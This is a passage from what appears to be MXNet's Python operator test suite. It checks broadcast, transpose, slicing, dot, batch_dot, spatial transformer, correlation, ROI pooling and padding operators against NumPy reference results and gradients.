mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for _ in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_device(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for _ in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for _ in range(5):
dims = []
begin = []
end = []
idx = []
for _ in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_device(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_device(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_device(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for _ in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_device()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_device(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_device()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_device()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._device)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._device)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_device(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_device())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
